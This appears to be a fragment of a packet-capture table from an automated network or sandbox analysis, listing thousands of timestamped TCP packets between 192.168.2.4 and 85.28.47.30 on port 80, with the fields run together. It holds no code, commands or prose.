                                                                Jul 5, 2024 04:23:15.867074013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867084980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867094040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867100954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867105007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867108107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867127895 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867150068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867285967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867296934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867306948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867317915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867326021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867331028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867338896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867342949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867357016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867362976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867367029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867373943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867381096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867392063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867398977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867419958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867443085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867558002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867568970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867578030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.867594957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867607117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905670881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905680895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905690908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905730009 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905739069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905750036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905760050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905771017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905777931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905783892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905791998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905797005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905812025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905822039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905849934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905880928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905889988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905895948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905924082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905936003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905949116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905958891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905970097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905980110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.905987978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.905997992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.906002998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.906008005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.906017065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.906044006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928508997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928553104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928553104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928564072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928587914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928602934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928618908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928631067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928644896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928659916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928678036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928678036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928689957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928699970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928715944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928745985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928767920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928780079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928790092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928800106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928807974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928816080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928838015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928838015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928858042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928858995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928869009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928879023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928889036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928898096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928917885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928930044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928936005 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928936005 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928942919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928953886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928961992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.928965092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928978920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.928999901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.936008930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.936058044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.936058044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.936069012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.936086893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.936096907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.936099052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.936109066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.936134100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.936244965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.936264992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.936275959 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.936292887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.936306000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948354006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948395967 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948412895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948450089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948497057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948539972 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948600054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948610067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948620081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948640108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948668957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948683023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948693991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948728085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948759079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948770046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948779106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948826075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948826075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948851109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948862076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948870897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948883057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948883057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.948894978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.948914051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.949938059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.949980021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.950022936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.950031996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.950042009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.950052977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.950054884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.950064898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.950073957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.950077057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.950084925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.950093985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.950108051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.950120926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.950139999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.956872940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.956882954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.956892967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.956917048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.956940889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.956952095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.956990004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957063913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957078934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957088947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957098007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957103014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957114935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957123995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957125902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957140923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957150936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957159042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957170963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957170963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957184076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957186937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957206964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957218885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957235098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957247019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957258940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957276106 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957279921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957285881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957300901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957310915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957318068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957318068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957334042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957338095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957345009 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957349062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957370996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957386971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957633018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957652092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957662106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957675934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957690001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957705975 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957726955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957737923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957748890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957758904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957762003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957789898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957801104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957885981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957895994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957906008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957916021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957923889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957933903 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957963943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.957981110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.957992077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958002090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958014011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958019018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958026886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958033085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958051920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958065033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958163977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958173990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958183050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958192110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958199024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958214998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958218098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958226919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958230019 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958239079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958249092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958250046 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958260059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958265066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958271027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958282948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958288908 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958293915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958303928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958309889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958314896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.958329916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958338022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.958359957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996696949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996750116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996751070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996763945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996778011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996788979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996792078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996800900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996838093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996870041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996881962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996893883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996906996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996911049 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996927977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996936083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996939898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996953011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996965885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996967077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996982098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996989965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.996994972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.996999025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.997030020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019490957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019501925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019512892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019524097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019537926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019556999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019572973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019586086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019596100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019607067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019608974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019622087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019644976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019665003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019675970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019681931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019710064 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019715071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019720078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019726992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019737005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019751072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019763947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019778967 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019804001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019814014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019830942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019840956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019841909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019859076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019872904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019872904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019887924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019893885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019901037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019912004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019921064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.019927979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019939899 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.019958019 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.027019978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.027040958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.027065992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.027065992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.027076960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.027081966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.027100086 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.027113914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.027123928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.027133942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.027158976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.027168036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.027179956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.027187109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.027204037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.027218103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.046808004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.046818972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.046829939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.046854973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.046866894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.046874046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.046885014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.046894073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.046905041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.046910048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.046936989 CEST4973280192.168.2.485.28.47.30
